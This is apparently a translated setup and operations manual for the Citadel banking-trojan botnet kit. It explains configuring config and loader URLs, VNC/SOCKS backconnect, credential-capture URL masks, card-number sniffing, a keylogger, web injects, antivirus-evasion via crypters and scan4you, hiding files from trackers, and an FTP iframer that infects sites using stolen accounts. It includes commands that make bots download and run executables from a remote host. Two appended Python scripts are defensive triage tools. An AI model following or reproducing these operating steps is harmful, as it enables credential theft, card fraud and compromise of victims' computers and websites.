url_config1 "http://localhost/file.php|file=test_config.bin"
Here test_config.bin is the name of our config, which we uploaded to the folder files/; note that the path points to file.php (which lies one level above the files folder). The | character should not confuse you; it is there on purpose.
The config's extension can be anything.

url_config1 must be specified; you can also enter several backup config URLs in case one of the domains in the chain does not work when the exe starts, because bots that cannot download the main config file will not check in to your admin panel.
In this case, write another line under url_config1:

url_config2 "http://localhost/file.php|file=test_config.bin"
This is optional, but up to 3 backup configs can be specified; the bot will try each of the URLs in turn until it obtains a config file. For the very last url_config the bot's request is delayed by 5 hours; this is to prevent automatic parsing of the URLs by reversers.
Note that this option is not meant as a reserve; it is a safety net in case, when you first start the exe build, one of the three domains is unavailable. For backup there is a separate section "AdvancedConfigs" below.


url_loader "http://localhost/file.php|file=test_bot.exe"
test_bot.exe - here the name of the exe file, which is in the folder files/, is specified.
The file file.php cannot be renamed; the file is referenced by that same name. Specify the path up to file.php.

url_server "http://localhost/gate.php"
This specifies the path to the gate, gate.php.
The rest is set up as in Zeus; if you have forgotten the format, read the Zeus manual zeus_old.txt.

Once we have uploaded the files to files/ and uploaded the entire webserver folder as a whole, create a database.
Go to the address: http://www.vash-host.com/webserver/install
The webserver folder on the server can be renamed arbitrarily.
Enter all the values (DB, passwords, RC4 key) and then delete the install directory.
 
 
 
************************************************** ******************************
========================== >>>>> 4. Installing BackConnect Windows Server (VNC module)
************************************************** ******************************
To install the server side you need a Windows VPS/dedicated server, preferably XP, 2003 or 2008.
Install the XAMPP/WAMP/Apache web server with PHP support. Turn off UAC and the Windows Firewall so that the ports can be opened. Also disable the domain policy and leave any domain completely.
Upload the scripts from backconnect\winserv_php_gate into the web directory.
The web admin panel of the connector will be at: http://ip-serv/control.html
It logs VNC/BackConnect Socks connections.
Possible problems: because of the Windows firewall, check this point very carefully. Do not forget to restart Windows after disabling the firewall.
All scripts must lie in the root of the server; do not create any folders.
If you do not know how to install Apache with PHP, here is a manual: http://www.ripecms.com/documentation/articles/installing-apache-php
************************************************** ******************************
========================== >>>>> 5. Installing Citadel VNC Admin Interface
************************************************** ******************************
If you purchased the VNC admin module, the "VNC" section will be available in your panel.
Let us go over the options that may cause difficulty.
To get started, click "Configuration" and enter there the IP address of the Windows server to which you have already uploaded the backconnect scripts. Enter only the IP address, nothing else.
How does "connect" differ from "autoconnect"?
If you specify "connect" for some bot, it will execute this command once and send you the connection data. If you specify "autoconnect", the bot will initiate a connection to the backconnect server every time it comes online. This option applies both to BackConnect Socks and to VNC.
Now let us define the URL masks by which our VNC admin panel will catch accounts, if there is a need for this.
URL mask: here you specify a URL pattern such as *mail.ru* or http://*.bank.com* (you can play as you like; the asterisks help).
Parameters: enter here the names of the POST variables of the form on the site that we are catching. For the example of mail.ru it would be Login* and Password*
The format of the parameters is simple: you can specify "login=", "login*", or just "login". Choose as you like, but do not forget to test the mask.
The parameters are not case sensitive.
Notify in Jabber?: set this option if you want each newly captured account to be sent to you. The Jabber address is defined in the settings; you can specify several, comma-separated.
IMPORTANT! For this to work, the Jabber bot data must be entered in "Options" (use only jabber.org or jabber.ru); all of this comes to you through it.
There is also the option of creating an autoconnect with the bot from which a new account came into the section. I.e., the account + port for a VNC/SOCKS connection come to you immediately.
Do not forget that a context menu is available on bots, links, etc. via the right mouse button: you can delete any unwanted account (send it to the trash), mark it as favourite, or enable/disable settings.
Example of the statistics table:
2 bots, 6 accounts, 5 live accounts (83%). The percentage of live accounts is computed on the basis that if the bot has not appeared online for more than 4 days, the account is considered dead.
There is also an API for quickly creating a VNC/SOCKS connection to the desired bot, for example when intercepting a token or a message, when you need to urgently get into the account under the holder: in the inject you call the api.php URL via javascript/iframe
/* VNCController
 * api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=VNC
 * api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=SOCKS
 * api.php/<token>/vnc/connect?botId=WIN-ABC123&protocol=VNC
 */
define('API_TOKEN_KEY', 'changethispassword');
Pass the IP or BotID, and the script tells the bot to establish the connection; the data come to your Jabber. The timing depends on the timer_stats setting in the Builder configuration.
Here is a tip for working with bots on Win7/Vista: use Firefox Portable for Win7/Vista; it works correctly. Do not forget to disable the wallpaper so as not to generate a lot of traffic. Also, to get into one of the directories, open the shortcut properties.
To connect to the bots, you must download a VNC client, for example UltraVNC (http://www.uvnc.com/downloads/ultravnc.html)
Then specify the IP address of the connecting Windows server (the connector) and the port of the bot session, which is shown in the admin panel or in the Jabber notification.
************************************************** ******************************
========================== >>>>> 6. Installing the web socks checker
************************************************** ******************************
The "SOCKS" section in the admin panel: nothing needs to be configured.
************************************************** ******************************
========================== >>>>> 7. Installing the log parser
************************************************** ******************************
The module consists of the "Links" section.
To create the link structure, you must click "Parse new reports" before using the module. If the module freezes due to heavy load or a large amount of data, it is recommended to temporarily remove the gate from the server so that the database is not clogged, and after use put the gate (gate.php) back.
************************************************** ******************************
========================== >>>>> 8. Installing CardSwipe
************************************************** ******************************
The module is built into the exe file and is configured through the config file. There are 2 options in StaticConfig:
enable_luhn10_get 1
enable_luhn10_post 1
The first parameter, GET LUHN10, analyses data in GET requests through WinSocket/WinInet for cards and dumps using the algorithm en.wikipedia.org/wiki/Luhn_algorithm
POST LUHN10 analyses the data in https:// POST requests.
Traditionally, all the important data is present only in POST requests.
To find cards, select the report type "LUHN10 request" in "Search Database" in the admin panel.
 
************************************************** ******************************
========================== >>>>> 9. Working with the crypt panel
************************************************** ******************************
There is a section "Crypt exe" in the Citadel admin panel. If it is not present, read below how to activate it.
It exists so that you can grant access to your crypter, and he periodically re-uploads the exe file that the bots download and update to.
At the same time the crypter does not have access to the rest of the admin panel; only this section is available to him.
First, activate this section for yourself: go to the "Users" section, click on your username below and look at the list of available options. Note 2 items:
r_svc_crypter_crypt - this item grants the privilege to re-upload the exe file.
r_svc_crypter_pay - this item grants the privilege to keep the table of payments for re-uploads.
Next, create a new user and give him ONLY the "r_svc_crypter_crypt" right, pass the login and password to the crypter, and he can re-upload exe files in files/ through the form.
Do not forget to set chmod 777 on the folder, and give access only to trusted parties.
Now, once the crypter re-uploads the exe file, a new entry appears in the table stating that the exe file is not paid for; you, in turn, check that everything is OK and mark in the admin panel that X crypts have been paid.
You can enter the data for Jabber notifications of scan4you checks in the same section.
 
************************************************** ******************************
========================== >>>>> 10. Installation of the proxy system (the "Build proxy" config button)
************************************************** ******************************
The proxy layer exists to hide the path to the config and exe files from trackers.
Since file.php in the webserver folder is responsible for serving the config and exe files to the bots, we can move this system to any FTP host (the proxy layer) and use it to hide the real paths.
The proxy layer can also obscure the path to the gate; for the gate there is a separate proxifier script in the folder other.
The only drawback of the gate proxifier: it does not transfer video files to your server.
Note that file.php from the webserver folder has nothing to do with, and is moreover not compatible with, the file.php that the "Build proxy" button generates. This button must be pressed only when your configuration is fully configured.
Generation of proxy layers to protect the config from trackers (a complete redirect system) is a BETA version.
The generator solves the problem of moving file.php to a separate host: you can use the proxy layer to redirect to your main config file and exe, thus protecting your exe from analysis by reversers and trackers.
Proxy layers are generated through the builder; for this there is a new button "Build the bot file-proxy" / "Build proxy".
On output we get 2 files, file.php and file_config.php (do not change the file names).
WARNING: file_config.php contains your encryption key in a modified form; it is taken from your config, so when generating the gate configuration it must be configured and working.
Now upload the files file_config.php and file.php to the proxy host and create a folder files in the same place, into which you put the exe, config and module files.
To deny direct access to the files in the folder files, create a .htaccess file as follows:
deny from all
In the config settings point url_config1 and url_loader at the proxy layer.
If you want to protect the gate and create a proxy for it, there is other/redir.php; open it and set the path to the real gate:
// URL of the original server.
$url = "http://localhost/s.php";

After that, save the script under any name and specify its path as the gate (url_server) in the bot config.
It is very important that sockets are allowed in PHP on the host, otherwise it will not work.
You can check this by creating a file 1.php containing <?php phpinfo(); ?>
It should display Sockets Support enabled.
Proxy layers do not currently transmit video and screenshots, only logs.
************************************************** ******************************
========================== >>>>> 11. A brief tutorial on the new admin panel features
************************************************** ******************************
1) The admin panel has a new section "Efficacy and Safety": we have integrated with the scan4you service, and now you can check all of your exe builds for detection in just one click right in the Citadel admin panel. You can also set up automatic scanning of the files once a day, and if one of your files is detected by more than a third of the antivirus engines, you will immediately receive a notification in your Jabber, so you can
replace the exe right away. Now this mechanism will work for you automatically.
=> To start, open Settings and enter there the Scan4you Profile ID (precisely the ID, NOT the login!!), the Scan4you API Token and the Jabber for notifications. Take these data from the profile settings at scan4you.net
Then go to the Options section and enter the Jabber bot data (register an account for the bot beforehand); it is recommended to use jabber.org, since with other servers there may be problems due to protocol incompatibilities.
Everything is ready.
2) Some customers have complained that only 40% of the bots update to the new exe version, and the others cannot update for some unknown reason. Indeed, the bug remained since Zeus; we have investigated and corrected it. Now there is a new parameter in the config: timer_autoupdate 8
It sets the time (in hours) at which the exe is downloaded from the server and restarted (the RC4 encryption_key must be the same). 80% of the bots now update successfully, and with the exe being re-crypted and re-uploaded, survivability has increased by 45%; your bots will always have a very fresh and clean build.
The path to the executable file is taken from the url_loader setting; accordingly, the more often you re-upload a clean exe, the cleaner the exe file on your bots. They download it and restart, updating themselves.
If you still have the problem, as before, that only a small part of the bots update to the new exe, then the likely problem is that a heuristic antivirus detects your new exe and does not let it run.

3) The video format from the bots has changed to .webm (HTML5); we have built an online video player into the Citadel admin panel, so now you can watch videos directly in your browser (Firefox/Opera recommended). Features: fast rewind/forward, full screen, search of videos by BotID, IP address and date.
Many of you use AZ and a personal admin panel for injects, collecting accounts, etc. Would you like to watch from your own admin panel how the transfer goes or how your inject behaves on the bot? It's easy! We have created an API system: now you can pass the BotID or IP address to the script, and the API will return you ready-made HTML embed code for the video from the bot, which you can insert and view on any host without having to go to the admin panel.

4) Added a convenient analyser/parser of system commands (CmdList) to the admin panel; now you can see the results of executing system commands, such as ipconfig, the list of PCs in the local network, the list of processes, etc., in a new table format.
A separate section "CMD parser".
5) Now when the build is installed on the bot, the following information is sent to the admin panel once, automatically: installed firewalls, installed antivirus software, installed programs.
You can view the information for a single bot or for the entire botnet. We have created a separate section where you can see all the statistics in the form of visual graphs and calculations. Now you know whom you are fighting ;)
In "Installed Software", if you see a lot of "Unknown" in the charts, it means the bot has no antivirus or firewall. Also, when searching bot reports, you will see a new report type.
6) The "Favourite logs" feature: you can mark any interesting account when searching data in the admin panel and then easily find it, since it will be highlighted in a different colour in "Favourite Reports".
You can also add a bot to favourites, without reports, with the "Make Favourite" button.
7) In "Search in database" there is the possibility of connecting to the log databases of other Citadel installations ("Connection with other DB").
For example, if you have an old admin panel with logs, you can connect to it and work with the logs.
This works only at the level of searching the log data; other features such as VNC and comments do not.
To connect, click "Settings" and enter the MySQL database data, then select it and click Connect.
When you are finished with the other database, connect the main database again so as not to get confused.
Connecting another database does not affect the functioning of the whole system.
8) In "Search in database" there are 2 new items: "stop words" and "Mask URL:".
The first allows you to exclude junk links from the search results; for example, if you search for the keyword "bank" and constantly come across the link "bankofbooks.com", enter it and it will no longer show up in the search; you can also save aliases so as not to enter this keyword every time.
"Mask URL:" allows you to set a finer search and increase the speed of data retrieval. Here only the links are searched, not the content.
 
************************************************** ******************************
========================== >>>>> 12. Working with API (api.php)
************************************************** ******************************
Working with api.php. Through the API you can pull the FTP accounts for any FTP iframer.
* IFramerController:
* api.php/<token>/iframer/ftpList
* api.php/<token>/iframer/ftpList?state=all
* api.php/<token>/iframer/ftpList?date_from=2012-12-31
* api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all
* api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all&plaintext=1

Through the API you can send Jabber messages (e.g. embedding a link in an inject); the API reads the Jabber bot options from the corresponding section in the admin panel and takes all recipients from the Jabber Notifier.

* JabberController:
* api.php/<token>/jabber/send?message=Hello%20world!

Through the API you can get the status of bots (online/offline):
* BotsController
* api.php/<token>/bots/online?botId[]=A-BOT&botId[]=B-BOT&...


=> Manual for exporting video files to an AZ admin panel based on the online player.
Requests of this kind:
/api.php/megakey/video/list.php?botnet=COOL&botIP=111.111.111.111
/api.php/megakey/video/list.php?botnet=COOL&botId=017_B4DF7611E03FF4C8
return PHP arrays or JSON in response.
Query format:
api.php/<security-token>/video/<action>[.<extension>]?<params>
<security-token> - the key that you specify in the script api.php; it is required to authorise with the server.
<action> - the command
<extension> - (optional) extension: the output format. If omitted, you see the debug output. Possible values: .dump, .php, .json, .xml
<params> - the parameters of the controller function (you can see them in the code)
Examples of queries:
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botIP=1.2.3.4
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123&embed=1

The botnet parameter is optional.
citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
And again, by substituting the extension you can get the desired format:



Adding the parameter &embed=1 we can get ready HTML embed code for all the videos, but I do not recommend it: there may be many of them) there is a separate function for this.
Example without passing the botnet name:
http://citadelhost/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69&embed=1

For other examples of working with the API, see the comments in the script api.php
************************************************** ******************************
========================== >>>>> 13. How to update the admin area and one during the next bot version of Citadel
************************************************** ******************************
Re-upload and overwrite all the scripts on the server with the new archive, go to the folder /install/ and click Update; wait until your tables are updated, which may take a long time. The data will not be lost.
If your database is too jam-packed, it makes sense to install your admin panel again in a new folder and send the bots the command user_execute http://www.host.com/newcitadel.exe
Note that the config format may change with each new version, so in order for everything to work correctly, adapt the NEW config (from the archive of the new version) to your configuration settings and re-upload it to your files folder along with the exe file and modules. Pay attention to the new options that appear in the configuration file that we ship with the Builder.
After that, in order for your bots to update to the new version, give the command user_execute http://www.temphost.com/newcitadel.exe
Check that the exe is accessible from the web at the link above.
************************************************** ******************************
========================== >>>>> 14. Description of the options in the config Builder
************************************************** ******************************
disable_cookies 1/0 - If set to 1, cookies will not be sent to the admin panel and .sol files will not be deleted from the holder's PC. If set to 0, all .sol files will be deleted and the cookies will be sent to your admin panel.
disable_antivirus 1/0 - If set to 1, the MiniAV module is turned off.
enable_luhn10_get 1 - CardSwipe module; if set to 1, intercepts cards/dumps in GET requests. THE MODULE IS BUILT INTO THE EXE FILE!
enable_luhn10_post 1 - CardSwipe module; if set to 1, intercepts cards/dumps in POST requests. THE MODULE IS BUILT INTO THE EXE FILE!
remove_certs 1 - If set to 1, certificates will not be sent.
timer_autoupdate 8 - Time in hours for auto-updating the exe from the folder files/. In other words, the number of hours after which the exe is downloaded and run each time.
disable_httpgrabber 1 - If set to 1, the HTTP report grabber is off and only HTTPS reports from all browsers are sent to the server.
report_software 1 - If set to 1, sends information about the firewall/antivirus/software to the admin panel.
use_module_ffcookie 1 - If set to 1, the Firefox cookie export module is generated; when the build starts, the cookies are sent to the admin panel in a convenient format.

Section entry "WebFilters"
To activate screenshots, insert the mask "@*paypal.com/*"
If you need full-screen screenshots, "@@*paypal.com/*"
To activate video recording, "#*paypal.com/*"

Subsection
entry "HttpVipUrls"
"*facebook.com/*"
end

Allows you to add exception links (http://) when HTTP grabbing is disabled (disable_httpgrabber 1). I.e., if you need only https:// logs, but there are a couple of http:// links that you want to see in the logs, then you set such links here as in the scheme above, without specifying the protocol, i.e. just the domain name: *bankofamerica.com*

entry "WebFakes" - WEBFAKES DO NOT WORK! But the section has not been removed.
 
************************************************** ******************************
========================== >>>>> 15. FTP-ifreymer. Description and setting
************************************************** ******************************
A) Script ifreymera
Poured on the left site and used as a "spacer": performs all the work. Click "Download Script" and fill it by ftp to host some left.
It is run by cron-specific task from your admin area.
Debugging capabilities:
* Create a folder next to the script iframer / write permissions. There he can save the preview ifreyminga files.
* Create next to the script file 'iframer.php.log' (the name of the script with the extension +. Log): there it will automatically write logs of actions found the folder ...
* Do not forget to set the right 666.777 if you want to debug.
You can download it on the page ifreymera in socket: [download].
Physically, he is in the system / utils /. Here it is not directly caused by simply stored :)
Ifreymer himself to work does not require any file and write permission: he carefully uses the PHP-session to store dannyah.
B) Configuration
Lets you set:
* URL of the iframer script to run.
* HTML code to insert.
* Mode of operation: 'off' - disabled; 'inject' - embed the HTML code; 'preview' - preview without modifying the files on the FTP: iframed files are saved to the folder 'iframed/' next to the script (if it exists and is writable).
* Injection method: smart (does not break PHP / JS / ASP files), append to the end, or overwrite.
* Folder traversal depth (levels 1 to 50).
* Masks for files and folders.
A file is iframed only if both its folder and the file itself match one of the masks.
If a folder matches a mask, the traversal depth is increased from there (for cases where public_html is nested deeply).
C) How the panel side works
First, before each phase of communication with the iframer, the panel runs a self-test: are all the vital functions available, do requests to the server behave predictably, and so on. If the self-test fails, no work is performed.

One cron job runs every 10 minutes, collects new FTP accounts from the database and creates jobs. Duplicate FTP accounts are not allowed.
These accounts are sent to the iframer script and added to its "job" list, regardless of whether it is running or not.

Another cron job also runs every 10 minutes. It simply launches the iframer script: if it is still running, nothing happens, but if it has died (for example, on the time limit) it is restarted. The restart threshold is 120 s.

And finally the last cron job: every minute it asks the iframer how its work is going: how many jobs are in the queue and how many are ready. If there are accounts it has already finished with, they are pulled out and saved. On the iframer side these accounts are removed to save memory.

To avoid possible errors, every data transfer is two-stage: request, response, then a request confirming the action.
If there are no results for an account within a day, it is sent again.
D) How the iframer works
At the start of the script there is a list of file extensions to ignore. These are never touched, even if they match one of the masks.
The iframer stores its data in the session, which is enabled on all hosting servers, so there is no need to fiddle with permissions or hunt for a writable folder :) It is written so that it works even under PHP 4.

The iframer survives a restart on the time limit: no important data is lost and it continues from where it stopped.
If the connection drops, the iframer reconnects on the next run.

Phases of work:
1. Connection attempt. If it fails three times in a row, the account is marked as invalid.
If there are many accounts that cannot be connected to, the iframer may appear to "freeze" while it sits through the timeouts. This is normal: it is trying :)
2. Authentication attempt. If it fails, the account is invalid.
3. Listing all folders and files to the specified depth. Files and folders matching the masks specified in the admin panel are selected. For each matching folder the traversal depth is increased.
4. Iframing phase. Note that in 'preview' mode the files on the FTP are not changed!
For each file its type is determined (by extension), and the type defines the iframing method. Supported: html, php, css, js, asp (and equivalent extensions).
A special marker is added together with the iframe code to avoid accidental re-iframing of the file.
In smart mode the code is added to the top of a PHP file, although it outputs the iframe at the end :)
In append mode the code is appended to the end of the file. It is done carefully so as not to break the syntax of the code. JS files are infected by injecting code that draws an iframe.
* At all stages statistics are collected, including the list of changed files.

The iframer is driven by two tasks:
* "Start" runs automatically every 10 minutes: it sends the new accounts and launches the long verification process.
* "Collect" runs every minute and takes away what is ready.
E) Interface
Shows the state of the iframer (in fact, the state of the cron tasks). You can manually trigger a task to refresh the information.
Shows the list of accounts. For each: status, error, list of pages (on click), statistics (on click).
Invalid accounts are deleted after a day: they hang around and then go.
 
*) The principle of the tasks and the iframer, on your fingers:

"Start" task: every 10 minutes
Take some new accounts and append them to the end of the task list.
The iframer then walks through the task list (accounts):
Take the 1st account. CONNECT. Did not connect within 10 s? Postpone, recheck later.
Take the 2nd. LOGIN! Authorization failed. Done with it: it is invalid.
Take the 3rd. Does not connect. Also recheck.
Take the 4th. Connected. Logged in. Parsing.. iframing.. finished: it is valid.
"Collect" task:
it can always connect and pull the intermediate results.) Here that is the 2nd and 4th, if they have had time to be processed.
When the 1st and 3rd accounts rack up a few more failed connections, they too will be marked as invalid.
 
Features added later:
- "Check only" mode. Speaks for itself.
- Option: re-iframe accounts after N days. Each account will be processed again after N days.
- Replacement of the old iframe with the new code. If you change the HTML code it is not blindly added again but replaces the old one :)
- Option "iframe only yesterday's accounts". Gives you a day to mark accounts as ignored before they are touched.
- Logging of iframer errors (!)
- Intelligent detection of folders (otherwise they are indistinguishable from files).
- Reset button. Thanks to the protection against re-iframing, accounts will not be spoiled :) Ignored accounts are kept (i.e. they are not spoiled either).
- Selective ignoring of accounts (do not iframe for nothing). Ignored accounts are shown for a day and then hidden. If you reset, they will hang around for another day.
- Sorting by recent events (found, sent, processed), in chronological order from top to bottom.
- Manual release lever (full manual mode). This is done by clicking on the tasks described above when the iframer mode is "off".
For example, you click the first to receive new accounts. Having ignored the ones you want, you click the second: they fly away for processing.
The third task, collecting results, always runs by itself :)
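For a site owner whose FTP credentials were stolen, the description above gives two concrete things to look for during cleanup: markup appended after the end of HTML/PHP files, and JavaScript that draws an iframe at runtime. The following is an added, defender-side triage script; it is not part of the manual and not the iframer's code, and the sample site it scans (file names, placeholder hosts) is constructed for illustration. It walks a web root to the same 1..50 depth range the iframer configuration uses and lists files that match either pattern.

```python
"""Triage a web root for files altered in the ways the iframer section describes.

Added defender-side example; it is not part of the manual and not the
iframer's code. The checks follow only what the section states: code is
appended to the end of files, and JS files get code that draws an iframe.
Sample files below are constructed, with placeholder hosts.
"""
import os
import re
import tempfile
from typing import Dict, List

IFRAME_TAG_RE = re.compile(r"<iframe\b", re.IGNORECASE)
HTML_END_RE = re.compile(r"</html\s*>", re.IGNORECASE)
# JS that builds an iframe at runtime: document.write("<iframe ...") or
# document.createElement("iframe").
JS_IFRAME_RE = re.compile(
    r"""document\.write\s*\(.{0,200}?<iframe|createElement\s*\(\s*['"]iframe['"]\s*\)""",
    re.IGNORECASE | re.DOTALL,
)
MARKUP_EXTS = (".html", ".htm", ".php", ".asp")


def scan_text(name: str, text: str) -> List[str]:
    """Return triage findings for one file; an empty list means nothing suspicious."""
    ext = os.path.splitext(name)[1].lower()
    findings: List[str] = []
    if ext in MARKUP_EXTS:
        m = HTML_END_RE.search(text)
        if m:
            tail = text[m.end():]
            if IFRAME_TAG_RE.search(tail) or JS_IFRAME_RE.search(tail):
                findings.append("iframe appended after </html>")
            elif tail.strip():
                findings.append("unexpected content after </html>")
    if ext == ".js" and JS_IFRAME_RE.search(text):
        findings.append("script writes an iframe at runtime")
    return findings


def scan_tree(root: str, max_depth: int = 50) -> Dict[str, List[str]]:
    """Walk root to max_depth (the manual's 1..50 range) and collect findings per file."""
    results: Dict[str, List[str]] = {}
    root = os.path.abspath(root)
    for dirpath, dirnames, filenames in os.walk(root):
        depth = os.path.relpath(dirpath, root).count(os.sep) + (dirpath != root)
        if depth >= max_depth:
            dirnames[:] = []  # do not descend further
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    findings = scan_text(fn, fh.read())
            except OSError:
                continue
            if findings:
                results[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return results


# Constructed sample site: one clean page, one page with appended markup,
# one script that draws an iframe, one legitimate script.
SAMPLE_FILES = {
    "index.html": "<html><body><h1>Shop</h1></body></html>\n",
    "about.html": "<html><body>About</body></html>\n"
                  '<iframe src="http://placeholder.invalid/" width="1" height="1"></iframe>\n',
    "js/menu.js": "function toggle(){ document.body.classList.toggle('open'); }\n",
    "js/track.js": 'document.write("<iframe src=\'http://placeholder.invalid/\' '
                   'width=1 height=1></iframe>");\n',
}


def demo() -> Dict[str, List[str]]:
    """Write the sample site to a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, findings in sorted(demo().items()):
        print(rel, "->", "; ".join(findings))
```

The output is a triage list, not proof of compromise: a legitimate page can contain an iframe, so the checks deliberately fire only on markup after the closing html tag and on scripts that construct iframes, which is what the section says the tool leaves behind. Compare flagged files against a known-good backup before restoring.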
 
********************************************************************************
========================== >>>>> 16. Description of the "Process keylogger" module
********************************************************************************
To activate the keylogger, add a new section to the Builder config:
entry "Keylogger"
processes "calc.exe;*notepad*"
time 1
end
*notepad* - the process is matched by a part of its name
calc.exe - the exact name of the process
Here we list the processes on which the keylogger is set.
Let me remind you that the keylogger is enabled by default for all browsers, so use this module only if you need to track some other application separately.
time 1 specifies the time in minutes: for how many minutes in a row, counted from the start of the application, keys are recorded.
The section may be placed either before the "CmdList" section or after it.

To search for the records in the admin panel, select the report type "keylogger".
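An analyst who recovers a config in this format wants to know which URLs trigger screenshots or video (the WebFilters prefixes in section 14) and which processes the keylogger section above watches. The following is an added example for that triage, not Citadel's own parser; the sample config it reads is constructed (placeholder domains and rules) and the function names are the author's own choice. It parses the entry ... end blocks, splits each WebFilters rule into its capture action and glob mask, evaluates a URL against them, and matches process names against the ';'-separated keylogger masks using the same exact-vs-partial semantics the section describes.

```python
"""Parse 'entry ... end' sections of a Citadel/Zeus-style config.

Added example for an analyst triaging a recovered config; this is not
Citadel's own parser and the sample config below is constructed, not a
real capture. It covers the WebFilters prefixes described in section 14
('@' screenshot, '@@' full-screen screenshot, '#' video) and the
Keylogger 'processes' / 'time' keys described in section 16.
"""
import fnmatch
import re
import shlex
from typing import Dict, List, Tuple

# Constructed sample config (domains and rules are placeholders).
SAMPLE_CONFIG = r'''
entry "WebFilters"
"@*paypal.com/*"
"@@*bankofamerica.com/*"
"#*example-bank.test/login*"
end
entry "HttpVipUrls"
"*facebook.com/*"
end
entry "Keylogger"
processes "calc.exe;*notepad*"
time 1
end
'''

ENTRY_RE = re.compile(r'^entry\s+"?([^"\s]+)"?\s*$')

# Longest prefix first, so "@@" is not misread as "@".
WEBFILTER_PREFIXES: Tuple[Tuple[str, str], ...] = (
    ("@@", "screenshot_fullscreen"),
    ("@", "screenshot"),
    ("#", "video"),
)


def parse_entries(text: str) -> Dict[str, List[str]]:
    """Return {section_name: [raw body lines]} for every entry ... end block."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if m:
            current = m.group(1)
            sections[current] = []
        elif line == "end":
            current = None
        elif current is not None:
            sections[current].append(line)
    return sections


def classify_webfilter(rule: str) -> Tuple[str, str]:
    """Split one WebFilters rule into (action, url_mask)."""
    rule = rule.strip('"')
    for prefix, action in WEBFILTER_PREFIXES:
        if rule.startswith(prefix):
            return action, rule[len(prefix):]
    return "plain", rule  # mask without a capture flag


def actions_for_url(url: str, rules: List[str]) -> List[str]:
    """Capture actions a URL would trigger; masks are case-insensitive globs."""
    actions = []
    for rule in rules:
        action, mask = classify_webfilter(rule)
        if fnmatch.fnmatchcase(url.lower(), mask.lower()):
            actions.append(action)
    return actions


def parse_keylogger(lines: List[str]) -> Dict[str, object]:
    """Extract the ';'-separated process masks and the 'time' value (minutes)."""
    cfg: Dict[str, object] = {"processes": [], "time": None}
    for line in lines:
        parts = shlex.split(line)
        if len(parts) < 2:
            continue
        if parts[0] == "processes":
            cfg["processes"] = [p for p in parts[1].split(";") if p]
        elif parts[0] == "time":
            cfg["time"] = int(parts[1])
    return cfg


def keylogger_targets(process_name: str, masks: List[str]) -> bool:
    """True if a process name matches any mask ('calc.exe' exact, '*notepad*' partial)."""
    name = process_name.lower()
    return any(fnmatch.fnmatchcase(name, m.lower()) for m in masks)


if __name__ == "__main__":
    sections = parse_entries(SAMPLE_CONFIG)
    for rule in sections.get("WebFilters", []):
        print("WebFilters:", classify_webfilter(rule))
    kl = parse_keylogger(sections.get("Keylogger", []))
    print("Keylogger masks:", kl["processes"], "time (min):", kl["time"])
    for proc in ("calc.exe", "notepad.exe", "cmd.exe"):
        print(proc, "->", keylogger_targets(proc, kl["processes"]))
```

Feeding a real recovered config through parse_entries gives a quick inventory of targeted domains per capture mode and of the non-browser applications being keylogged, which is usually the first thing an incident responder needs to report.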
 
********************************************************************************
========================== >>>>> 17. GeoIP botnet protection module
********************************************************************************
To enable the module, go to "Settings" in the admin panel, find the "Permitted countries" item and tick the desired country or countries.
All countries that are not ticked are automatically placed on the ignore list; reports from them are still written, but when a bot requests the config through file.php or sends requests to the gate, a 404 error is returned at the HTTP server level (you can check this with a sniffer).
A budget option against abuse. Recommended only for small, compartmentalized VIP botnets, to transfer valuable bots into a separate botnet.
If you notice a heavy load on the server, turn this setting off immediately.
********************************************************************************
========================== >>>>> 18. The "Duplicate log cleaner" module
********************************************************************************
To enable or disable the module, go to "Options", sub-item "Functions", and switch "Report deduplication" on or off.
If you notice a heavy load on the server, it is recommended to disable this module, since it is not designed for a large number of bots.
 
 
********************************************************************************
========================== >>>>> 19. Web injects module (WebInjects)
********************************************************************************
WebInjects. The module is designed for convenient handling of injects through browser injection technology. It lets you push an inject to any specific BotID, country or botnet in just a few minutes, without having to edit the config. Everything works through the admin panel.
A brief primer:
In the bot config, section DynamicConfig, add the parameter url_webinjects "http://www.host.com/file.php" (the path to file.php). The bot pulls this file every 2 minutes, fetching a pack of injects, which the inject distribution system hands out.
If the module is not needed, this line can be removed altogether, since it creates additional load.
In the "Web injects" section there are two subsections: "Webinject groups" and "Packs". The first has the structure "Group - Inject - Members (admitted to the group)" and is responsible for managing all injects. The second is responsible for configuring the distribution of injects (which bots receive an inject, and how many).
In the main menu, under "Members", create a new user with the right "r_botnet_webinjects_coder": this is a user who can manage the group that the administrator assigns to him. In other words, if you bring an inject developer into the admin panel and create such an account for him, he will have the right to create and edit his own injects; he does not see others' injects, his list shows only his own. I.e. you can create 5 groups and 5 inject coders, so that each person is responsible for his own group (set of injects). You see the statistics of everything that happens in the system and can combine the injects of all groups into one "pack", which will be pushed to all bots, to a particular group, or to a separate category of bots by class: country or botnet.
The admin panel has a convenient visual editor for injects with syntax highlighting. The format is fully compatible with the Zeus format.
There are several modes for packs:
Dual - both the local inject file from the config and the webinjects are active.
Single - only the webinjects; the local inject file is off.
Disabled - the webinjects are off and the local inject file works.
If by chance there is a mistake somewhere in an inject, the webinjects will not be assembled and you receive a DEBUG report stating which pack (bundle) failed to build.
On the bot's information page you can see the history of web inject tests; you can also search for the bot's DEBUG reports and view the history of webinject builds and errors.
